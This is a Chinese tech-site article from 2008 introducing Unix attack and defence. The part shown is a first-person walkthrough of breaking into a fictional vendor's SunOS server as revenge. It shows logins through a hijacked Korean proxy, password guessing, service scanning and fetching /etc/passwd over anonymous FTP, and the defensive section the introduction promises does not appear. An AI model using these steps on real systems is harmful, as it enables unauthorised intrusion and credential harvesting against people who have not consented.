科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道主流Unix操作系统的安全检测和防范

主流Unix操作系统的安全检测和防范

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

 这篇文章主要针对一些对网络安全感兴趣、同时又还不怎么熟悉Unix入侵和防范的朋友们而写的一篇文章。本文循序渐进地介绍了黑客攻击Unix主机的主要方法和系统管理员如何针对这些方法进行有效的防御等。

作者:论坛整理 来源:zdnet网络安全 2008年2月17日

关键字: 安全检测 系统安全 unix

  • 评论
  • 分享微博
  • 分享邮件
§.前言 

  这篇文章主要针对一些对网络安全感兴趣、同时又还不怎么熟悉Unix入侵和防范的朋友们而写的一篇文章。本文循序渐进地介绍了黑客攻击Unix主机的主要方法和系统管理员如何针对这些方法进行有效的防御等。 
  §.Unix的特点 

  Unix能流行起来绝对不是偶然的,这跟Unix本身的特点之突出是分不开的特点,那就是:1、极强的可移植性;2、启动异步进程的能力;3、一致的文件、设备和进程间I/O;5、层次化的文件系统;6、可用其它Shell来替代默认Shell的能力; 7、真正的多用户和多任务。 

  列位注意,通常的Unix系统用户有两种:根用户和普通用户。 

  1.root——根用户 

  这是SuperUser(超级用户)的帐号,可以用这个帐号对本系统进行所有操作!获得对系统的根访问权限,也是黑客们拼命追求的终极目标。 

  2.普通用户 

  给User(普通用户)使用,具体权限由root分配的账户。可以有多个等级。黑客们多由此类账户开始试图进入系统,如下例就是如此。 

  §.攻击Unix系统的范例 

  先补了一些关于Unix的知识,下面我们要开始小试牛刀了。我们的攻击平台是一台安装了Redhat 6.0(内核版本2.2.5-15)的工作站(当然Win9x/Win2000上也可以试试啰!)。 

  声明:本文中的目标主机的IP分别是202.202.0.8、202.103.10.110和211.50.33.117,以上IP纯属本人杜撰。如该IP所属主机确实存在,则纯属巧合。 

  开始啦! 

  “又死机了!这是什么烂东西?可恶!”我愤怒地猛击键盘“还号称全智能化软件……给您‘身临其境的美妙体验’……,完全是放P!”我怒吼着。才买几天的英语学习软件就频频死机,而且花去了不菲的xxx大元人民币,使我有一种彻底受骗的感觉。“你这个骗子,我非要给你点厉害看看,看你还到处骗人!”我一边愤愤地叫着,一边抄下了包装盒上那个“骗子”软件公司的网址:www.shitsoft.com.cn 。当夜无话。 

  第二天。忙了一早上,直到中午吃完中餐后才闲下来,众人皆昏昏然欲见周公,我则坐到我的红帽子旁,开始了正义的惩罚…… 

  首先找一台Proxy,这样就不会被反查法给抓到了。^_^ 不知原来那台韩国的“公鸡”还在不在?试一试: 

bash# telnet 211.50.33.117 
Red Hat Linux release 6.2 (Goozer) 
Kernel 2.2.14-5.0 on an i686 
login:crossbow 
password: 
bash$Content$nbsp;

  Ok! 还可以用,这么长时间没有理它,竟然还可以用!韩国的管理员真是太“好”了!^_^ 接着ping一下我们的目标,看看它长得啥模样: 

bash$Content$nbsp;pwd 
/home/crossbow 
bash$Content$nbsp;ping www.shitsoft.com.cn 
Pinging www.shitsoft.com.cn [202.202.0.8] with 32 bytes of data: 

Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 
Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 

Ping statistics for 202.202.0.8: 
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
Minimum = 0ms, Maximum = 0ms, Average = 0ms 

速度不慢,看IP是中国教育网的机器,从TTL看估计是一台Unix。验证一下: 
bash$Content$nbsp;telnet 202.202.0.8 
SunOS 5.6 
login: 

  呵呵,是一台SunOS 5.6的烂机器。先猜猜看: 

login:adm 
password: 
Login incorrect 

login:oracle 
password: 
Login incorrect 

login:ftp 
password: 
Login incorrect 

^C 

  可恶!今天火气真差!一个没猜到。:-( 用messala扫描一下看有没有CGI漏洞:(略去复杂的扫描过程)………… 结果是滴水不漏!:-( 这个鸟管理员还挺勤快的…… 只好用nss看看它开了什么服务吧!…………还好,telnet、ftp和finger的端口都打开了!^_^ 先看看有没有匿名ftp账户: 

bash$Content$nbsp;ftp 202.202.0.8 
Connected to 202.202.0.8... 
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready. 
Name(202.202.0.8:FakeName):anonymous 
331 Guest login ok,send you complete e-mail address as password. 
Password: 
230:Welcome,archive user! 
………… 
………… 
………… 
ftp> 

  还行,匿名ftp服务没有关,竟然可以用anonymous账户进来了!赶紧抓他的passwd: 

ftp>ls 
………… 
bin boot etc dev home lib usr proc lost+found root sbin src tmp usr var 
………… 
ftp>cd /etc 
………… 
ftp>ls *passwd* 
………… 
passwd passwd- 
………… 

  不会如此简单吧?看一看?: 

ftp>cat passwd|more 
………… 
root:x:0:1:Super-User:/:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
telnet:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 
ftp:60001:60001:Ftp:/: 
noaccess:x:60002:60002:No Access User:/: 
nobody:x:65534:65534:SunOS 4.x Nobody:/: 
dennis:x:1005:20::/export/home/dennis:/bin/sh 
walter:x:1001:100::/export/home/walter:/bin/sh 
power:x:9589:101::/export/home/power:/bin/sh 
deal:x:1035:20::/export/home/deal:/bin/sh 
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh 
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh 
render:x:9591:101::/export/home/render:/bin/sh 

………… 

  倒霉,是个空的passwd!看看备份: 

ftp>cat passwd-|more 
………… 
root:x:0:1:Super-User:/:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
telnet:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 
ftp:60001:60001:Ftp:/: 
noaccess:x:60002:60002:No Access User:/: 
nobody :x:65534:65534:SunOS 4.x Nobody:/: 
dennis:x:1005:20::/export/home/dennis:/bin/sh 
walter:x:1001:100::/export/home/walter:/bin/sh 
power:x:9589:101::/export/home/power:/bin/sh 
deal:x:1035:20::/export/home/deal:/bin/sh 
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh 
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh 
render:x:9591:101::/export/home/render:/bin/sh 

………… 

没救了,一样的!查查看有没有shadow文件: 
ftp>ls *shadow* 
………… 
shadow shadow- 
………… 

  哈哈,一般passwd是空的,那么密码就在shadow中! 

ftp>cat shadow|more 
………… 
[sh$Content$nbsp;cat shadow|more]: Permission denied 
………… 

  可恶,看都不让看,试试备份文件: 

ftp>cat shadow-|more 
………… 
[sh$Content$nbsp;cat shadow-|more]: Permission denied 
………… 

  都一样——不让看!Faint! 只好可怜惜惜地把空passwd抓回来——有几个用户名总比没有强吧? 

ftp>get passwd 
226 Transfer complete. 
540 bytes received in 0.55 seconds (1.8Kbytes/s) 
ftp>bye 
221 Goodbye. 
bash$Content$nbsp;
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章